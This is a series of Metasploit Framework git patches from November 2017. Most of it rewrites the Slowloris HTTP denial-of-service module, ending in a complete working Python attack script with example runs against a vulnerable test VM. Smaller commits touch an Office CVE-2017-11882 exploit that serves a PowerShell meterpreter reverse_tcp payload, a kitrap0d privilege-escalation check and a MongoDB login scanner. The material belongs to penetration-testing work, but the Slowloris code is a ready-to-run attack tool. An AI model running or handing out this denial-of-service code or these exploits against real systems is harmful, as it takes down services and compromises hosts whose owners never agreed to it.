b/modules/auxiliary/dos/http/slow_loris.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info( info, 'Name' => 'Slow Loris DoS', - 'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. + 'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. It accomplishes this by opening connections to the target web server and sending a partial request. Periodically, it will send subsequent requests, adding to but never completing the request.}, 'License' => MSF_LICENSE, @@ -33,7 +33,7 @@ class MetasploitModule < Msf::Auxiliary Opt::RPORT(80), OptInt.new('THREADS', [true, 'The number of concurrent threads', 1000]), OptInt.new('HEADERS', [true, 'The number of custom headers sent by each thread', 10]), - OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 15]) + OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 15]) ]) end @@ -44,7 +44,7 @@ class MetasploitModule < Msf::Auxiliary def headers datastore['HEADERS'] end - + def timeout datastore['TIMEOUT'] end From e07fe77a69aac59622caedfaec0828c8e1920d81 Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Mon, 13 Nov 2017 18:51:07 -0500 Subject: [PATCH 196/254] Close sockets to resolve file handle error --- modules/auxiliary/dos/http/slow_loris.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb index d1b38d0377..5d96e3ad85 100644 --- a/modules/auxiliary/dos/http/slow_loris.rb +++ b/modules/auxiliary/dos/http/slow_loris.rb @@ -60,13 +60,14 @@ class MetasploitModule < Msf::Auxiliary 1.upto(thread_count) do |i| threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i| begin - connect() - sock.puts(header) + current_sock = connect(global=false) + current_sock.puts(header) headers.times do data = "X-a-#{rand(0..1000)}: b\r\n" - sock.puts(data) + current_sock.puts(data) sleep rand(1..timeout) end + disconnect(nsock=current_sock) end end end From db2bd22d860151d45ac761bda1fcee93ccf66b7a Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Tue, 14 Nov 2017 21:11:17 +0000 Subject: [PATCH 197/254] Update slow_loris.rb --- modules/auxiliary/dos/http/slow_loris.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb index 5d96e3ad85..daaa116ec0 100644 --- a/modules/auxiliary/dos/http/slow_loris.rb +++ b/modules/auxiliary/dos/http/slow_loris.rb @@ -63,7 +63,7 @@ class MetasploitModule < Msf::Auxiliary current_sock = connect(global=false) current_sock.puts(header) headers.times do - data = "X-a-#{rand(0..1000)}: b\r\n" + data = Rex::Text.rand_text_alpha(3) + "-#{rand(0..1000)}: b\r\n" current_sock.puts(data) sleep rand(1..timeout) end From b6c81e6da0513a6e8a9b99272d884006453f094b Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Tue, 21 Nov 2017 16:21:01 -0500 Subject: [PATCH 198/254] Reimplement slowloris as external module --- .../modules/auxiliary/dos/http/slow_loris.md | 43 ------ .../modules/auxiliary/dos/http/slowloris.md | 47 +++++++ .../external/python/metasploit/module.py | 6 +- modules/auxiliary/dos/http/slow_loris.rb | 78 ----------- modules/auxiliary/dos/http/slowloris.py | 130 ++++++++++++++++++ 5 files changed, 180 insertions(+), 124 deletions(-) delete mode 100644 documentation/modules/auxiliary/dos/http/slow_loris.md create mode 100644 documentation/modules/auxiliary/dos/http/slowloris.md delete mode 100644 modules/auxiliary/dos/http/slow_loris.rb create mode 100755 modules/auxiliary/dos/http/slowloris.py diff --git a/documentation/modules/auxiliary/dos/http/slow_loris.md b/documentation/modules/auxiliary/dos/http/slow_loris.md deleted file mode 100644 index 26d66104bf..0000000000 --- a/documentation/modules/auxiliary/dos/http/slow_loris.md +++ /dev/null @@ -1,43 +0,0 @@ -## Vulnerable Application - -This module tries to keep many connections to the target web server open and hold them open as long as possible. - -To test this module download and setup the Metasploitable 2 vulnerable Linux virtual machine available at [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/). - -Vulnerable app versions include: - -- Apache HTTP Server 1.x and 2.x -- Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27 and 7.0.0 beta - -## Verification Steps - -1. Start msfconsole -2. Do: `use auxiliary/dos/http/slow_loris` -3. Do: `set RHOST` -4. Do: `run` -5. Visit server URL in your web-browser. - -## Scenarios - -### Apache/2.2.8 - Ubuntu 8.04 - -``` -msf > use auxiliary/dos/http/slow_loris -msf auxiliary(slow_loris) > show options - -Module options (auxiliary/dos/http/slow_loris): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - HEADERS 10 yes The number of custom headers sent by each thread - RHOST yes The target address - RPORT 80 yes The target port (TCP) - THREADS 1000 yes The number of concurrent threads - -msf auxiliary(slow_loris) > set RHOST 192.168.216.129 -RHOST => 192.168.216.129 -msf auxiliary(slow_loris) > run - -[*] 192.168.216.129:80 - Executing requests 1 - 1000... - -``` diff --git a/documentation/modules/auxiliary/dos/http/slowloris.md b/documentation/modules/auxiliary/dos/http/slowloris.md new file mode 100644 index 0000000000..dfa1937774 --- /dev/null +++ b/documentation/modules/auxiliary/dos/http/slowloris.md @@ -0,0 +1,47 @@ +## Vulnerable Application + +This module tries to keep many connections to the target web server open and hold them open as long as possible. + +To test this module download and setup the Metasploitable 2 vulnerable Linux virtual machine available at [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/). + +Vulnerable application versions include: + +- Apache HTTP Server 1.x and 2.x +- Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27 and 7.0.0 beta + +## Verification Steps + +1. Start msfconsole +2. Do: `use auxiliary/dos/http/slowloris` +3. Do: `set RHOST` +4. Do: `run` +5. Visit server URL in your web-browser. + +## Scenarios + +### Apache/2.2.8 - Ubuntu 8.04 + +``` +msf > use auxiliary/dos/http/slowloris +msf auxiliary(slowloris) > show options + +Module options (auxiliary/dos/http/slowloris): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + delay 15 yes The delay between sending keep-alive headers + rand_user_agent true yes Randomizes user-agent with each request + rhost 172.28.128.4 yes The target address + rport 80 yes The target port + sockets 150 yes The number of sockets to use in the attack + ssl false yes Negotiate SSL/TLS for outgoing connections + +msf auxiliary(slowloris) > set rhost 172.28.128.4 +rhost => 172.28.128.4 +msf auxiliary(slowloris) > run + +[*] Starting server... +[*] Attacking 172.28.128.4 with 150 sockets +[*] Creating sockets... +[*] Sending keep-alive headers... Socket count: 150 +``` diff --git a/lib/msf/core/modules/external/python/metasploit/module.py b/lib/msf/core/modules/external/python/metasploit/module.py index 2f12c8210d..9b5b563c6a 100644 --- a/lib/msf/core/modules/external/python/metasploit/module.py +++ b/lib/msf/core/modules/external/python/metasploit/module.py @@ -21,15 +21,15 @@ def report_service(ip, opts={}): }}) -def run(metadata, exploit): +def run(metadata, module_callback): req = json.loads(os.read(0, 10000)) if req['method'] == 'describe': rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata}) elif req['method'] == 'run': args = req['params'] - exploit(args) + module_callback(args) rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': { - 'message': 'Exploit completed' + 'message': 'Module completed' }}) def rpc_send(req): diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb deleted file mode 100644 index daaa116ec0..0000000000 --- a/modules/auxiliary/dos/http/slow_loris.rb +++ /dev/null @@ -1,78 +0,0 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Auxiliary - include Msf::Exploit::Remote::Tcp - include Msf::Auxiliary::Dos - - def initialize(info = {}) - super(update_info( - info, - 'Name' => 'Slow Loris DoS', - 'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. - It accomplishes this by opening connections to the target web server and sending a partial request. - Periodically, it will send subsequent requests, adding to but never completing the request.}, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'RSnake', # Vulnerability disclosure - 'Daniel Teixeira' # Metasploit module - ], - 'References' => - [ - [ 'CVE', '2007-6750' ], - [ 'CVE', '2010-2227' ], - [ 'URL', 'https://www.exploit-db.com/exploits/8976/' ] - ], - )) - - register_options( - [ - Opt::RPORT(80), - OptInt.new('THREADS', [true, 'The number of concurrent threads', 1000]), - OptInt.new('HEADERS', [true, 'The number of custom headers sent by each thread', 10]), - OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 15]) - ]) - end - - def thread_count - datastore['THREADS'] - end - - def headers - datastore['HEADERS'] - end - - def timeout - datastore['TIMEOUT'] - end - - def run - starting_thread = 1 - header = "GET / HTTP/1.1\r\n" - threads = [] - - loop do - print_status("Executing requests #{starting_thread} - #{(starting_thread + thread_count) - 1}...") - - 1.upto(thread_count) do |i| - threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i| - begin - current_sock = connect(global=false) - current_sock.puts(header) - headers.times do - data = Rex::Text.rand_text_alpha(3) + "-#{rand(0..1000)}: b\r\n" - current_sock.puts(data) - sleep rand(1..timeout) - end - disconnect(nsock=current_sock) - end - end - end - threads.each(&:join) - starting_thread += thread_count - end - end -end diff --git a/modules/auxiliary/dos/http/slowloris.py b/modules/auxiliary/dos/http/slowloris.py new file mode 100755 index 0000000000..81ddaa1b5f --- /dev/null +++ b/modules/auxiliary/dos/http/slowloris.py @@ -0,0 +1,130 @@ +#!/usr/bin/env python +# Note, works with both python 2.7 and 3 + +import random +import socket +import ssl +import sys +import time + +from metasploit import module + +metadata = { + 'name': 'Slowloris Denial of Service Attack', + 'description': ''' + Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. + It accomplishes this by opening connections to the target web server and sending a partial request. + Periodically, it will send subsequent HTTP headers, adding to-but never completing-the request. + Affected servers will keep these connections open, filling their maximum concurrent connection pool, + eventually denying additional connection attempts from clients. + ''', + 'authors': [ + 'RSnake', # Vulnerability disclosure + 'Gokberk Yaltirakli', # Simple slowloris in Python + 'Daniel Teixeira', # Metasploit module (Ruby) + 'Matthew Kienow ' # Metasploit external module (Python) + ], + 'date': '2009-06-17', + 'references': [ + {'type': 'cve', 'ref': '2007-6750'}, + {'type': 'cve', 'ref': '2010-2227'}, + {'type': 'url', 'ref': 'https://www.exploit-db.com/exploits/8976/'}, + {'type': 'url', 'ref': 'https://github.com/gkbrk/slowloris'} + ], + 'type': 'dos', + 'options': { + 'rhost': {'type': 'address', 'description': 'The target address', 'required': True, 'default': None}, + 'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 80}, + 'sockets': {'type': 'int', 'description': 'The number of sockets to use in the attack', 'required': True, 'default': 150}, + 'delay': {'type': 'int', 'description': 'The delay between sending keep-alive headers', 'required': True, 'default': 15}, + 'ssl': {'type': 'bool', 'description': 'Negotiate SSL/TLS for outgoing connections', 'required': True, 'default': False}, + 'rand_user_agent': {'type': 'bool', 'description': 'Randomizes user-agent with each request', 'required': True, 'default': True} + }} + +list_of_sockets = [] +user_agents = [ + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", + "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0", + "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36", + "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0", +] + +def init_socket(host, port, use_ssl=False, rand_user_agent=True): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(4) + + if use_ssl: + s = ssl.wrap_socket(s) + + s.connect((host, port)) + + s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8")) + + if rand_user_agent: + s.send("User-Agent: {}\r\n".format(random.choice(user_agents)).encode("utf-8")) + else: + s.send("User-Agent: {}\r\n".format(user_agents[0]).encode("utf-8")) + + s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8")) + return s + +def run(args): + host = args['rhost'] + port = int(args['rport']) + use_ssl = args['ssl'] == "true" + rand_user_agent = args['rand_user_agent'] == "true" + socket_count = int(args['sockets']) + delay = int(args['delay']) + + module.log("Attacking %s with %s sockets" % (host, socket_count), 'info') + + module.log("Creating sockets...", 'info') + for i in range(socket_count): + try: + module.log("Creating socket number %s" % (i), 'debug') + s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent) + except socket.error: + break + list_of_sockets.append(s) + + while True: + module.log("Sending keep-alive headers... Socket count: %s" % len(list_of_sockets), 'info') + for s in list(list_of_sockets): + try: + s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8")) + except socket.error: + list_of_sockets.remove(s) + + for _ in range(socket_count - len(list_of_sockets)): + module.log("Recreating socket...", 'debug') + try: + s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent) + if s: + list_of_sockets.append(s) + except socket.error: + break + time.sleep(delay) + +if __name__ == "__main__": + module.run(metadata, run) From 785e5944d665786b273ae067f908bd64215493a0 Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Tue, 21 Nov 2017 18:19:20 -0500 Subject: [PATCH 199/254] Enhanced slowloris HTTP headers and minor cleanup --- modules/auxiliary/dos/http/slowloris.py | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/dos/http/slowloris.py b/modules/auxiliary/dos/http/slowloris.py index 81ddaa1b5f..416b1bbf5e 100755 --- a/modules/auxiliary/dos/http/slowloris.py +++ b/modules/auxiliary/dos/http/slowloris.py @@ -4,7 +4,7 @@ import random import socket import ssl -import sys +import string import time from metasploit import module @@ -70,6 +70,11 @@ user_agents = [ "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0", ] + +def create_random_header_name(size=8, seq=string.ascii_uppercase + string.ascii_lowercase): + return ''.join(random.choice(seq) for _ in range(size)) + + def init_socket(host, port, use_ssl=False, rand_user_agent=True): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(4) @@ -89,6 +94,7 @@ def init_socket(host, port, use_ssl=False, rand_user_agent=True): s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8")) return s + def run(args): host = args['rhost'] port = int(args['rport']) @@ -102,7 +108,7 @@ def run(args): module.log("Creating sockets...", 'info') for i in range(socket_count): try: - module.log("Creating socket number %s" % (i), 'debug') + module.log("Creating socket number %s" % i, 'debug') s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent) except socket.error: break @@ -112,7 +118,9 @@ def run(args): module.log("Sending keep-alive headers... Socket count: %s" % len(list_of_sockets), 'info') for s in list(list_of_sockets): try: - s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8")) + s.send("{}: {}\r\n".format(create_random_header_name(random.randint(8, 16)), + random.randint(1, 5000)).encode("utf-8")) + except socket.error: list_of_sockets.remove(s) @@ -126,5 +134,6 @@ def run(args): break time.sleep(delay) + if __name__ == "__main__": module.run(metadata, run) From 81c6823b729062bb44e85180bfa4926be458a85c Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 21 Nov 2017 17:50:53 -0600 Subject: [PATCH 200/254] handle interrupt and unknown exceptions properly with external modules --- lib/msf/core/module/external.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/module/external.rb b/lib/msf/core/module/external.rb index 5a6c1bf29d..4c08d5a4e2 100644 --- a/lib/msf/core/module/external.rb +++ b/lib/msf/core/module/external.rb @@ -17,9 +17,11 @@ module Msf::Module::External end end end - rescue Exception => e #Msf::Modules::External::Bridge::Error => e + rescue Interrupt => e + raise e + rescue Exception => e elog e.backtrace.join("\n") - fail_with Failure::UNKNOWN, e.message + fail_with Msf::Module::Failure::Unknown, e.message end end From db4c0fcca989162c12c1e811660cfb63f9083259 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Tue, 21 Nov 2017 19:02:14 -0500 Subject: [PATCH 201/254] spelling --- modules/exploits/windows/fileformat/office_ms17_11882.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index 83995534f2..9592fbad75 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -171,12 +171,12 @@ class MetasploitModule < Msf::Exploit::Remote def on_request_uri(cli, _request) if _request.raw_uri =~ /\.sct$/ - print_status("Handling initial request from #{cli.peerhost}") + print_status("Handling request for .sct from #{cli.peerhost}") payload = gen_psh("#{get_uri}", "string") data = gen_sct_file(payload) send_response(cli, data, 'Content-Type' => 'text/plain') else - print_status("Stage two requested, sending...") + print_status("Delivering payload...") p = regenerate_payload(cli) data = cmd_psh_payload(p.encoded, payload_instance.arch.first, From 275f70e77e9decfd42ca6d67be3ea840f67876e1 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Tue, 21 Nov 2017 19:34:04 -0500 Subject: [PATCH 202/254] better saving --- modules/exploits/windows/fileformat/office_ms17_11882.rb | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index 9592fbad75..1e52fcc476 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote )) register_options([ - OptString.new("FILENAME", [true, "Filename to save as"]) + OptString.new("FILENAME", [true, "Filename to save as", "msf.rtf"]) ]) end @@ -134,10 +134,12 @@ class MetasploitModule < Msf::Exploit::Remote payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first payload = header + payload + footer - ::File.open(datastore['FILENAME'], 'wb') do |fd| + path = ::File.join(Msf::Config.local_directory, datastore['FILENAME']) + ::File.open(path, 'wb') do |fd| fd.write(payload) fd.close end + print_good("Wrote payload to #{path}") end @@ -176,7 +178,7 @@ class MetasploitModule < Msf::Exploit::Remote data = gen_sct_file(payload) send_response(cli, data, 'Content-Type' => 'text/plain') else - print_status("Delivering payload...") + print_status("Delivering payload to #{cli.peerhost}...") p = regenerate_payload(cli) data = cmd_psh_payload(p.encoded, payload_instance.arch.first, From 960893b99dca4f845cce067319c26d68b5914d8b Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Wed, 22 Nov 2017 06:36:46 -0500 Subject: [PATCH 203/254] change default payload --- modules/exploits/windows/fileformat/office_ms17_11882.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index 1e52fcc476..f87d1032fb 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote }, 'DefaultOptions' => { 'EXITFUNC' => 'thread', - 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' + 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' } )) From ae43883e2b4c830fa9dbc49381d8b9fb0054a2ea Mon Sep 17 00:00:00 2001 From: attackdebris Date: Wed, 22 Nov 2017 08:03:12 -0500 Subject: [PATCH 204/254] Fix mongodb_login typo --- modules/auxiliary/scanner/mongodb/mongodb_login.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/mongodb/mongodb_login.rb b/modules/auxiliary/scanner/mongodb/mongodb_login.rb index 532b649332..092258531f 100644 --- a/modules/auxiliary/scanner/mongodb/mongodb_login.rb +++ b/modules/auxiliary/scanner/mongodb/mongodb_login.rb @@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary :exploited_at => Time.now.utc, :info => "Mongo server has no authentication." ) - print_good("Mongo server #{ip.to_s} dosn't use authentication") + print_good("Mongo server #{ip.to_s} doesn't use authentication") end disconnect rescue ::Exception => e From 0d79a3a3e284a71805a3ac69f0fc32c2b7fc1d30 Mon Sep 17 00:00:00 2001 From: vipzen <7483228+vipzen@users.noreply.github.com> Date: Thu, 23 Nov 2017 08:35:55 -0200 Subject: [PATCH 205/254] Add support to Windows .NET Server --- modules/exploits/windows/local/ms10_015_kitrap0d.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/ms10_015_kitrap0d.rb b/modules/exploits/windows/local/ms10_015_kitrap0d.rb index f195409a4f..c1152c0670 100644 --- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb +++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb @@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Local # Validate OS version winver = sysinfo["OS"] - unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows 2008|Windows 7/ + unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows .NET Server|Windows 2008|Windows 7/ return Exploit::CheckCode::Safe end From c9da8f7a1857660fc2860eb3fe539ba045768785 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 24 Nov 2017 10:01:50 -0800 Subject: [PATCH 206/254] Bump version of framework to 4.16.20 --- Gemfile.lock | 6 +++--- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index c20a197a6d..9f6cd73794 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.16.19) + metasploit-framework (4.16.20) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -311,7 +311,7 @@ GEM rspec-mocks (3.7.0) diff-lcs (>= 1.2.0, < 2.0) rspec-support (~> 3.7.0) - rspec-rails (3.7.1) + rspec-rails (3.7.2) actionpack (>= 3.0) activesupport (>= 3.0) railties (>= 3.0) @@ -357,7 +357,7 @@ GEM activemodel (>= 4.2.7) activesupport (>= 4.2.7) xmlrpc (0.3.0) - yard (0.9.9) + yard (0.9.11) PLATFORMS ruby diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index cfde864472..7e90de291c 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.16.19" + VERSION = "4.16.20" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 8645a518b3f8a084512e01691e255ea19164b88a Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Fri, 24 Nov 2017 20:27:34 -0600 Subject: [PATCH 207/254] add mettle support for custom headers --- Gemfile.lock | 4 +-- lib/msf/base/sessions/mettle_config.rb | 25 +++++++++++++------ lib/msf/core/payload/transport_config.rb | 3 +++ metasploit-framework.gemspec | 2 +- .../linux/aarch64/meterpreter_reverse_http.rb | 2 +- .../aarch64/meterpreter_reverse_https.rb | 2 +- .../linux/aarch64/meterpreter_reverse_tcp.rb | 2 +- .../linux/armbe/meterpreter_reverse_http.rb | 2 +- .../linux/armbe/meterpreter_reverse_https.rb | 2 +- .../linux/armbe/meterpreter_reverse_tcp.rb | 2 +- .../linux/armle/meterpreter_reverse_http.rb | 2 +- .../linux/armle/meterpreter_reverse_https.rb | 2 +- .../linux/armle/meterpreter_reverse_tcp.rb | 2 +- .../linux/mips64/meterpreter_reverse_http.rb | 2 +- .../linux/mips64/meterpreter_reverse_https.rb | 2 +- .../linux/mips64/meterpreter_reverse_tcp.rb | 2 +- .../linux/mipsbe/meterpreter_reverse_http.rb | 2 +- .../linux/mipsbe/meterpreter_reverse_https.rb | 2 +- .../linux/mipsbe/meterpreter_reverse_tcp.rb | 2 +- .../linux/mipsle/meterpreter_reverse_http.rb | 2 +- .../linux/mipsle/meterpreter_reverse_https.rb | 2 +- .../linux/mipsle/meterpreter_reverse_tcp.rb | 2 +- .../linux/ppc/meterpreter_reverse_http.rb | 2 +- .../linux/ppc/meterpreter_reverse_https.rb | 2 +- .../linux/ppc/meterpreter_reverse_tcp.rb | 2 +- .../linux/ppc64le/meterpreter_reverse_http.rb | 2 +- .../ppc64le/meterpreter_reverse_https.rb | 2 +- .../linux/ppc64le/meterpreter_reverse_tcp.rb | 2 +- .../ppce500v2/meterpreter_reverse_http.rb | 2 +- .../ppce500v2/meterpreter_reverse_https.rb | 2 +- .../ppce500v2/meterpreter_reverse_tcp.rb | 2 +- .../linux/x64/meterpreter_reverse_http.rb | 2 +- .../linux/x64/meterpreter_reverse_https.rb | 2 +- .../linux/x64/meterpreter_reverse_tcp.rb | 2 +- .../linux/x86/meterpreter_reverse_http.rb | 2 +- .../linux/x86/meterpreter_reverse_https.rb | 2 +- .../linux/x86/meterpreter_reverse_tcp.rb | 2 +- .../linux/zarch/meterpreter_reverse_http.rb | 2 +- .../linux/zarch/meterpreter_reverse_https.rb | 2 +- .../linux/zarch/meterpreter_reverse_tcp.rb | 2 +- .../osx/x64/meterpreter_reverse_http.rb | 2 +- .../osx/x64/meterpreter_reverse_https.rb | 2 +- .../osx/x64/meterpreter_reverse_tcp.rb | 2 +- 43 files changed, 62 insertions(+), 50 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index f83e37305d..dfcf9d1632 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -19,7 +19,7 @@ PATH metasploit-model metasploit-payloads (= 1.3.15) metasploit_data_models - metasploit_payloads-mettle (= 0.2.5) + metasploit_payloads-mettle (= 0.2.8) msgpack nessus_rest net-ssh @@ -189,7 +189,7 @@ GEM postgres_ext railties (~> 4.2.6) recog (~> 2.0) - metasploit_payloads-mettle (0.2.5) + metasploit_payloads-mettle (0.2.8) method_source (0.9.0) mini_portile2 (2.3.0) minitest (5.10.3) diff --git a/lib/msf/base/sessions/mettle_config.rb b/lib/msf/base/sessions/mettle_config.rb index f135818614..369562a9c1 100644 --- 